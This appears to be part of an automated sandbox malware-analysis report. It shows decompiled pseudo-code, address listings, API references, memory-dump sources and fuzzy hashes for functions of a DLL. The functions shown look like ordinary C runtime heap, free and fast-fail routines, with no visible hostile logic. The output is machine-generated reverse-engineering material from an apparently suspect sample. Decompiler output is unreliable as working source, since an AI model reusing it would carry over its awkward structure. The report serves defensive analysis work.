								_t158 = E6E20D69C(_t191, _a12, 0x6e23fa78);
								_t199 = _t199 + 0xc;
								__eflags = _t158;
								if(_t158 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									L63:
									_t104 = E6E208956();
									asm("int3");
									_push(_t195);
									_t196 = _t199;
									_push(_t161);
									_push(_t191);
									_t192 = 0;
									__eflags = _v524;
									if(_v524 > 0) {
										_push(_t184);
										_t185 =  &_a8;
										while(1) {
											_t67 = _t185 + 4; // 0x8914c483
											_t185 = _t67;
											_t104 = E6E21BAEB(_v0, _a4,  *_t185);
											_t199 = _t199 + 0xc;
											__eflags = _t104;
											if(_t104 != 0) {
												break;
											}
											_t192 = _t192 + 1;
											__eflags = _t192 - _a8;
											if(_t192 < _a8) {
												continue;
											}
											goto L69;
										}
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E6E208956();
										asm("int3");
										_push(_t196);
										_v588 = _v588 & 0x00000000;
										_v592 = _v592 & 0x00000000;
										__eflags = _v568 - 5;
										if(_v568 <= 5) {
											_v20 = E6E20FA06(0, _t172, _t182);
											E6E2199E9(0, _t172, _t182, __eflags);
											_t108 = _v20;
											_t79 = _t108 + 0x350;
											 *_t79 =  *(_t108 + 0x350) | 0x00000010;
											__eflags =  *_t79;
											_v32 =  &_v20;
											_v52 =  &_v28;
											_v48 =  &_v20;
											_v44 =  &_v24;
											_v40 =  &_v4;
											_v36 =  &_v0;
											_push( &_v32);
											_push( &_v52);
											_push( &_v13); // executed
											E6E211334( &_v13, _t182,  *_t79); // executed
											return _v24;
										}
										 *((intOrPtr*)(E6E20BB7E())) = 0x16;
										E6E208929();
										return 0;
									}
									L69:
									return _t104;
								} else {
									__eflags = _t161;
									if(_t161 != 0) {
										 *_t161 = 0;
									}
									goto L2;
								}
							}
						}
					}
				} else {
					L1:
					L2:
					return E6E203D51(_v8 ^ _t195);
				}
				goto L75;
			}









































































    0x6e2117c5
    0x6e2117d0
    0x6e2117d7
    0x6e2117dd
    0x6e2117de
    0x6e2117e1
    0x6e2117e2
    0x6e2117e5
    0x6e2117eb
    0x6e2117f1
    0x6e2117f2
    0x6e2117f5
    0x6e2117fd
    0x6e211812
    0x6e211817
    0x6e211819
    0x6e21181c
    0x6e211822
    0x6e211825
    0x6e21182b
    0x6e211836
    0x6e211840
    0x6e211842
    0x6e211849
    0x6e21184f
    0x6e211855
    0x6e21185a
    0x6e21185d
    0x6e21185f
    0x6e2119d4
    0x6e2119d6
    0x6e2119d7
    0x6e2119d8
    0x6e2119d9
    0x6e2119da
    0x00000000
    0x6e211865
    0x6e211865
    0x6e211869
    0x6e21189f
    0x6e21189f
    0x6e2118a1
    0x6e2118a1
    0x6e2118a3
    0x6e2118a6
    0x6e2118a6
    0x6e2118a9
    0x6e2118ac
    0x6e2118ac
    0x6e2118b3
    0x6e2118b5
    0x6e2118bb
    0x6e211933
    0x6e211933
    0x6e21193a
    0x6e211944
    0x6e211947
    0x6e21194d
    0x6e21194e
    0x6e211950
    0x6e2119e0
    0x00000000
    0x6e211956
    0x6e211956
    0x6e21195c
    0x6e21195e
    0x6e211964
    0x6e211965
    0x6e211966
    0x6e211967
    0x6e211970
    0x6e211969
    0x6e211969
    0x6e211969
    0x6e211975
    0x6e211978
    0x6e21197a
    0x6e2119e6
    0x6e2119ec
    0x6e2119ee
    0x6e211af1
    0x6e211af7
    0x6e211af7
    0x6e211af9
    0x6e211afb
    0x6e211afe
    0x6e211afe
    0x6e211b01
    0x6e211b04
    0x6e211b04
    0x6e211b0b
    0x6e211b10
    0x6e211b1a
    0x6e211b1f
    0x6e211b22
    0x6e211b24
    0x00000000
    0x6e211b2a
    0x6e211b2a
    0x6e211b2b
    0x6e211b2c
    0x6e211b2d
    0x6e211b2e
    0x00000000
    0x6e211b2e
    0x6e2119f4
    0x6e211a03
    0x6e211a08
    0x6e211a0a
    0x6e211a16
    0x6e211a16
    0x6e211a1c
    0x6e211a0c
    0x6e211a0c
    0x6e211a12
    0x6e211a14
    0x00000000
    0x00000000
    0x6e211a14
    0x6e211a25
    0x6e211a27
    0x6e211a2a
    0x6e211a37
    0x6e211a3c
    0x6e211a3f
    0x6e211a41
    0x00000000
    0x6e211a43
    0x6e211a43
    0x6e211a4e
    0x6e211a53
    0x6e211a56
    0x6e211a58
    0x00000000
    0x6e211a5e
    0x6e211a5e
    0x6e211a5f
    0x6e211a60
    0x6e211a62
    0x00000000
    0x6e211a62
    0x6e211a58
    0x6e211a41
    0x6e21197c
    0x6e211982
    0x6e21198e
    0x6e211993
    0x6e211999
    0x6e21199c
    0x6e21199e
    0x6e211a78
    0x6e211a78
    0x6e211a7a
    0x6e211a7d
    0x6e211aaa
    0x6e211ab0
    0x6e211ab0
    0x6e211ab2
    0x00000000
    0x6e211a7f
    0x6e211a7f
    0x6e211a84
    0x6e211a86
    0x00000000
    0x6e211a88
    0x6e211a8b
    0x6e211a94
    0x6e211a99
    0x6e211a9c
    0x6e211a9e
    0x6e211ab5
    0x6e211ab5
    0x00000000
    0x6e211aa0
    0x6e211aa0
    0x6e211aa1
    0x6e211aa2
    0x6e211aa3
    0x6e211aa4
    0x00000000
    0x6e211aa4
    0x6e211a9e
    0x6e211a86
    0x6e2119a4
    0x6e2119a4
    0x6e2119aa
    0x6e2119ad
    0x6e2119ad
    0x6e2119b0
    0x6e2119b3
    0x6e2119b3
    0x6e2119be
    0x6e2119c3
    0x6e2119ca
    0x6e2119cb
    0x6e2119ce
    0x6e211a68
    0x6e211a68
    0x6e211a6d
    0x6e211a70
    0x6e211a72
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e211a72
    0x6e21199e
    0x6e21197a
    0x6e2118bd
    0x6e2118bd
    0x6e2118c3
    0x6e2118c5
    0x6e2118c5
    0x6e2118c8
    0x6e2118cb
    0x00000000
    0x00000000
    0x6e2118cd
    0x6e2118d0
    0x6e2118e7
    0x6e2118e7
    0x6e2118d2
    0x6e2118d2
    0x6e2118d6
    0x6e2118da
    0x00000000
    0x6e2118dc
    0x6e2118dc
    0x6e2118df
    0x6e2118e2
    0x6e2118e5
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2118e5
    0x6e2118da
    0x6e2118f0
    0x6e2118f0
    0x6e2118f2
    0x6e211abb
    0x6e211abb
    0x6e211abd
    0x6e211ac7
    0x6e211ac7
    0x6e211ac9
    0x6e211acf
    0x6e211ada
    0x6e211adf
    0x6e211ae2
    0x6e211ae4
    0x00000000
    0x6e211aea
    0x00000000
    0x6e211aea
    0x6e2118f8
    0x6e2118f8
    0x6e2118fe
    0x6e211900
    0x6e211900
    0x6e211903
    0x6e211906
    0x00000000
    0x00000000
    0x6e211908
    0x6e21190b
    0x6e211922
    0x6e211922
    0x6e21190d
    0x6e21190d
    0x6e211911
    0x6e211915
    0x00000000
    0x6e211917
    0x6e211917
    0x6e21191a
    0x6e21191d
    0x6e211920
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e211920
    0x6e211915
    0x6e21192b
    0x6e21192b
    0x6e21192d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e21192d
    0x6e211926
    0x6e211928
    0x6e211928
    0x00000000
    0x6e211928
    0x00000000
    0x6e2118f2
    0x6e2118eb
    0x6e2118ed
    0x6e2118ed
    0x00000000
    0x6e2118ed
    0x6e21186b
    0x6e21186b
    0x6e21186d
    0x6e211871
    0x00000000
    0x6e211873
    0x6e211873
    0x6e211882
    0x6e211887
    0x6e21188a
    0x6e21188c
    0x6e211b31
    0x6e211b32
    0x6e211b33
    0x6e211b34
    0x6e211b35
    0x6e211b36
    0x6e211b36
    0x6e211b3b
    0x6e211b3e
    0x6e211b3f
    0x6e211b41
    0x6e211b44
    0x6e211b45
    0x6e211b47
    0x6e211b4a
    0x6e211b4c
    0x6e211b4d
    0x6e211b50
    0x6e211b50
    0x6e211b50
    0x6e211b5b
    0x6e211b60
    0x6e211b63
    0x6e211b65
    0x00000000
    0x00000000
    0x6e211b67
    0x6e211b68
    0x6e211b6b
    0x00000000
    0x00000000
    0x00000000
    0x6e211b6d
    0x6e211b72
    0x6e211b73
    0x6e211b74
    0x6e211b75
    0x6e211b76
    0x6e211b77
    0x6e211b7c
    0x6e211b7f
    0x6e211b85
    0x6e211b89
    0x6e211b8d
    0x6e211b91
    0x6e211bac
    0x6e211baf
    0x6e211bb4
    0x6e211bba
    0x6e211bba
    0x6e211bba
    0x6e211bc4
    0x6e211bca
    0x6e211bd0
    0x6e211bd6
    0x6e211bdc
    0x6e211be2
    0x6e211be8
    0x6e211bec
    0x6e211bf0
    0x6e211bf1
    0x00000000
    0x6e211bf6
    0x6e211b98
    0x6e211b9e
    0x00000000
    0x6e211ba3
    0x6e211b6e
    0x6e211b71
    0x6e211892
    0x6e211892
    0x6e211894
    0x6e211896
    0x6e211896
    0x00000000
    0x6e211898
    0x6e21188c
    0x6e211871
    0x6e211869
    0x6e2117ff
    0x6e2117ff
    0x6e211801
    0x6e211811
    0x6e211811
    0x00000000

    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$CodeCurrentFeaturePagePresentProcessorTerminateValid
    • String ID:
    • API String ID: 2794151160-0
    • Opcode ID: 15f9c07be5c6147c4a3e5ac7d2a3ad4e4f4c5efd63665435c93beea661cfc61f
    • Instruction ID: 79bb3211e316d84c8ecc41538292d86556b90d80b7bfc6cbeb5374c35b4d3c43
    • Opcode Fuzzy Hash: 15f9c07be5c6147c4a3e5ac7d2a3ad4e4f4c5efd63665435c93beea661cfc61f
    • Instruction Fuzzy Hash: E391C07591821F9BEB549FA4CC51BEA73FAFF28345F0044A9DE0997244E7319B88CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20E78A, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: c054752571f5b6019bd8398e5afe447a42b0ae4f00ef3d274b80a8cf43193065
    • Instruction ID: 9983fad3c21e825a568cb72e006629fbfb64eb11a4e4fe98a2b20dcab1dfae9f
    • Opcode Fuzzy Hash: c054752571f5b6019bd8398e5afe447a42b0ae4f00ef3d274b80a8cf43193065
    • Instruction Fuzzy Hash: 3B417E72A10719CF9B08DFADC88495EBBF2EB8E710B1541AAE515DB3A4D7309840CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E213D8A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E6E213D8A(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E6E20FB55(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E6E213A88(_t28, _t35, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E6E20FBB2(0);
				return _t31;
			}













    0x6e213d8f
    0x6e213d90
    0x6e213d97
    0x6e213d9c
    0x6e213da0
    0x6e213da4
    0x6e213da7
    0x6e213dad
    0x6e213dad
    0x6e213db3
    0x6e213db5
    0x6e213db8
    0x6e213db8
    0x6e213dbb
    0x6e213dbd
    0x6e213dc3
    0x6e213dc7
    0x6e213dcc
    0x6e213dd0
    0x6e213dd2
    0x6e213dd5
    0x6e213ddb
    0x6e213de2
    0x6e213de6
    0x6e213dea
    0x6e213ded
    0x6e213ded
    0x6e213df1
    0x6e213df4
    0x6e213da9
    0x6e213da9
    0x6e213da9
    0x6e213df6
    0x6e213e03

    APIs
      • Part of subcall function 6E20FB55: RtlAllocateHeap.NTDLL(00000008,6E1F73C4,00000000,?,6E20FABB,00000001,00000364,?,0000060B,?,6E20BB83,6E20FC2F,?,?,6E203D1F,0000060B), ref: 6E20FB96
    • _free.LIBCMT ref: 6E213DF6
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 77c382067f7c907403c7a9bdaa9eee3e96e2d402955483d7b424f2cdbe0a7b47
    • Instruction ID: 9bb86732a968d79b634daeab4ab1716dde9afc4a9a9d5c524959b88502e6b980
    • Opcode Fuzzy Hash: 77c382067f7c907403c7a9bdaa9eee3e96e2d402955483d7b424f2cdbe0a7b47
    • Instruction Fuzzy Hash: A001DB761043096BE3218F999C859DAFBEFFB85371F26051DD694832C0EB3069058764
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20FB55, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E6E20FB55(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e2e3aa8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E219AB0();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E20BB7E())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6E20DBA3(_t15, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}










    0x6e20fb55
    0x6e20fb5b
    0x6e20fb60
    0x6e20fb6e
    0x6e20fb6e
    0x6e20fb74
    0x6e20fb76
    0x6e20fb76
    0x6e20fb8d
    0x6e20fb96
    0x6e20fb9e
    0x00000000
    0x00000000
    0x6e20fb7e
    0x6e20fb80
    0x6e20fba2
    0x6e20fba7
    0x6e20fbad
    0x00000000
    0x6e20fbad
    0x6e20fb83
    0x6e20fb88
    0x6e20fb89
    0x6e20fb8b
    0x00000000
    0x00000000
    0x6e20fb8b
    0x00000000
    0x6e20fb8d
    0x6e20fb66
    0x6e20fb6c
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,6E1F73C4,00000000,?,6E20FABB,00000001,00000364,?,0000060B,?,6E20BB83,6E20FC2F,?,?,6E203D1F,0000060B), ref: 6E20FB96
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 74f8a7329542a2dbc64394a64d9a8392da895a33ad744d7de7edd9b160db1a8b
    • Instruction ID: bb76266345a211a2efb9c45693764c6bbcaa9175777c810a34086a887ab86a8c
    • Opcode Fuzzy Hash: 74f8a7329542a2dbc64394a64d9a8392da895a33ad744d7de7edd9b160db1a8b
    • Instruction Fuzzy Hash: 3CF0BB355C562E6BBB511EE78C24E9B375FAF49771B208111D816A65C4CB30D8018EA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2113DA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E2113DA(intOrPtr* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				void* _t13;
				void* _t20;
				intOrPtr* _t24;
				intOrPtr _t25;

				_t24 = __ecx;
				_t25 = E6E20FB55(__ecx, 1, 0xb8);
				 *((intOrPtr*)( *__ecx)) = _t25;
				_t13 = E6E20FBB2(0);
				if(_t25 != 0) {
					_v24 =  *_t24;
					_v20 =  *((intOrPtr*)(_t24 + 4));
					_v16 =  *((intOrPtr*)(_t24 + 8));
					_v12 =  *((intOrPtr*)(_t24 + 0xc));
					_v8 =  *((intOrPtr*)(_t24 + 0x10));
					_t20 = E6E2113B2(4,  &_v24); // executed
					return _t20;
				}
				return _t13;
			}












    0x6e2113eb
    0x6e2113f2
    0x6e2113f8
    0x6e2113fa
    0x6e211404
    0x6e211408
    0x6e21140e
    0x6e211414
    0x6e21141a
    0x6e211420
    0x6e211429
    0x00000000
    0x6e21142f
    0x6e211435

    APIs
      • Part of subcall function 6E20FB55: RtlAllocateHeap.NTDLL(00000008,6E1F73C4,00000000,?,6E20FABB,00000001,00000364,?,0000060B,?,6E20BB83,6E20FC2F,?,?,6E203D1F,0000060B), ref: 6E20FB96
    • _free.LIBCMT ref: 6E2113FA
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Heap$AllocateErrorFreeLast_free
    • String ID:
    • API String ID: 314386986-0
    • Opcode ID: 6f6e27df355312973080b7763a9fcc39cd7a309e8238a06763ed735208929a6e
    • Instruction ID: 9de1a6804f68dd816cf41f793e5abbcf7266107c0e62d03ed2aebbe822309f2b
    • Opcode Fuzzy Hash: 6f6e27df355312973080b7763a9fcc39cd7a309e8238a06763ed735208929a6e
    • Instruction Fuzzy Hash: 76F08C76A0020AAFD310DFA8C441B8AB7F8EB48710F104266ED18D7380EB71AA508BD1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E207249, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E6E207249(intOrPtr __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags, intOrPtr _a8, intOrPtr _a12) {
				signed int* _v0;
				void* __ebp;
				void* _t8;
				void* _t9;
				intOrPtr* _t11;
				signed int _t14;
				intOrPtr _t20;
				intOrPtr _t22;
				intOrPtr _t25;
				signed int* _t26;
				intOrPtr _t27;
				signed int* _t28;
				intOrPtr _t30;
				intOrPtr _t33;
				void* _t34;
				void* _t38;

				_t30 = __esi;
				_t27 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_t8 = E6E207257(__ecx);
				if(_t8 == 0) {
					_t9 = E6E21806D(); // executed
					if(_t9 != 0) {
						_push(0x16);
						E6E2180C8();
					}
					if(( *0x6e24b2c0 & 0x00000002) != 0) {
						if(IsProcessorFeaturePresent(0x17) != 0) {
							_push(7);
							asm("int 0x29");
						}
						E6E20875F(_t20, _t25, _t27, _t30, 3, 0x40000015, 1);
						_t38 = _t38 + 0xc;
					}
					E6E20E0A6(3);
					asm("int3");
					_t26 = _v0;
					_push(_t30);
					if(_t26 == 0) {
						L13:
						_t11 = E6E20BB7E();
						_push(0x16);
						goto L14;
					} else {
						_t22 = _a8;
						if(_t22 == 0) {
							goto L13;
						} else {
							_t33 = _a12;
							if(_t33 != 0) {
								_push(_t27);
								_t28 = _t26;
								_t34 = _t33 - _t26;
								while(1) {
									_t14 =  *(_t34 + _t28) & 0x0000ffff;
									 *_t28 = _t14;
									_t28 =  &(_t28[0]);
									if(_t14 == 0) {
										break;
									}
									_t22 = _t22 - 1;
									if(_t22 != 0) {
										continue;
									}
									break;
								}
								if(_t22 != 0) {
								} else {
									 *_t26 = 0;
									_t11 = E6E20BB7E();
									_push(0x22);
									L14:
									_pop(0);
									 *_t11 = 0;
									E6E208929();
								}
							} else {
								 *_t26 = 0;
								goto L13;
							}
						}
					}
					return 0;
				} else {
					return _t8; // executed
				}
			}



















    0x6e207249
    0x6e207249
    0x6e207249
    0x6e207249
    0x6e207249
    0x6e207250
    0x6e20d659
    0x6e20d660
    0x6e20d662
    0x6e20d664
    0x6e20d669
    0x6e20d671
    0x6e20d67c
    0x6e20d67e
    0x6e20d681
    0x6e20d681
    0x6e20d68c
    0x6e20d691
    0x6e20d691
    0x6e20d696
    0x6e20d69b
    0x6e20d6a1
    0x6e20d6a4
    0x6e20d6a7
    0x6e20d6bc
    0x6e20d6bc
    0x6e20d6c1
    0x00000000
    0x6e20d6a9
    0x6e20d6a9
    0x6e20d6ae
    0x00000000
    0x6e20d6b0
    0x6e20d6b0
    0x6e20d6b5
    0x6e20d6d0
    0x6e20d6d1
    0x6e20d6d3
    0x6e20d6d5
    0x6e20d6d5
    0x6e20d6d9
    0x6e20d6dc
    0x6e20d6e2
    0x00000000
    0x00000000
    0x6e20d6e4
    0x6e20d6e7
    0x00000000
    0x00000000
    0x00000000
    0x6e20d6e7
    0x6e20d6ec
    0x6e20d6ee
    0x6e20d6f0
    0x6e20d6f3
    0x6e20d6f8
    0x6e20d6c3
    0x6e20d6c3
    0x6e20d6c4
    0x6e20d6c6
    0x6e20d6c6
    0x6e20d6b7
    0x6e20d6b9
    0x00000000
    0x6e20d6b9
    0x6e20d6b5
    0x6e20d6ae
    0x6e20d6cf
    0x6e207256
    0x6e207256
    0x6e207256

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017,6E20FA89,?,?,?,?,?,?,?,6E200044), ref: 6E20D675
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: 58ea77f847b90ae4cb115ec02d168afb1d4448a3c519b14752fab24c5b76c64d
    • Instruction ID: 3018b1a2eb8fb84cf09b0ce6ab35fe5fe47bf40bbae4b13349530bd1be3f9a6d
    • Opcode Fuzzy Hash: 58ea77f847b90ae4cb115ec02d168afb1d4448a3c519b14752fab24c5b76c64d
    • Instruction Fuzzy Hash: C2E08C1D28430F67FB1921F0BC27BEB068F0F51B1EF140828AB29A80C2EFC582818825
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20A005, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
    Download Yara Rule
    C-Code - Quality: 64%
    			E6E20A005(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				signed int _t74;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				intOrPtr _t82;
				signed int _t85;
				signed int _t92;
				intOrPtr _t94;
				signed int _t107;
				intOrPtr* _t109;
				void* _t111;
				void* _t116;
				signed int _t120;
				signed int _t121;
				signed int _t124;
				void* _t129;
				signed int _t130;
				signed int _t132;
				intOrPtr _t133;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr _t137;
				signed int _t138;
				void* _t142;
				void* _t143;
				void* _t145;

				_t129 = __edi;
				_t128 = __edx;
				_t109 = __ecx;
				_t105 = __ebx;
				_push(0xc);
				_push(0x6e249300);
				E6E21F360();
				_t134 =  *((intOrPtr*)(E6E20FA06(__ebx, _t109, _t128) + 0xc));
				if(_t134 != 0) {
					_v4 = _v4 & 0x00000000;
					_t109 = _t134;
					 *0x6e2211c4();
					 *_t134();
					_v4 = 0xfffffffe;
				}
				E6E20D659(_t105, _t128, _t129, _t134);
				asm("int3");
				_push(_t109);
				if(_v0 != 0) {
					_push(_t134);
					_push(_t129);
					_t130 = 0;
					_t74 = E6E212891( &_v8, 0, 0, _a8, 0x7fffffff);
					_t143 = _t142 + 0x14;
					__eflags = _t74;
					if(_t74 == 0) {
						L9:
						_t135 = E6E20FB55(_t109, _v8, 2);
						_pop(_t111);
						__eflags = _t135;
						if(_t135 == 0) {
							L15:
							E6E20FBB2(_t135);
							_t77 = _t130;
							goto L16;
						} else {
							_t78 = E6E212891(_t130, _t135, _v8, _a8, 0xffffffff);
							_t143 = _t143 + 0x14;
							__eflags = _t78;
							if(_t78 == 0) {
								_t130 = E6E211B7D(_t105, _t111, _a4, _t135);
								goto L15;
							} else {
								__eflags = _t78 - 0x16;
								if(_t78 == 0x16) {
									goto L17;
								} else {
									__eflags = _t78 - 0x22;
									if(_t78 != 0x22) {
										goto L15;
									} else {
										goto L17;
									}
								}
							}
						}
					} else {
						__eflags = _t74 - 0x16;
						if(_t74 == 0x16) {
							L17:
							_push(_t130);
							_push(_t130);
							_push(_t130);
							_push(_t130);
							_push(_t130);
							E6E208956();
							asm("int3");
							_t81 = E6E204A80(_t128, 0x6e249320, 0x1c);
							_push(_a8);
							_t137 = _a4;
							L4();
							_t116 = _t137;
							_t132 = _t81;
							__eflags = _t132;
							if(_t132 != 0) {
								_t82 = E6E20FA06(_t105, _t116, _t128);
								_v40 = _t82;
								_v48 =  *((intOrPtr*)(_t82 + 0x4c));
								_t118 =  *((intOrPtr*)(_t82 + 0x48));
								_v44 =  *((intOrPtr*)(_t82 + 0x48));
								_v32 = 0;
								_t85 = E6E212B32( *((intOrPtr*)(_t82 + 0x48)),  &_v32, 0, 0, _t132, 0,  &_v48);
								_t145 = _t143 + 0x18;
								__eflags = _t85;
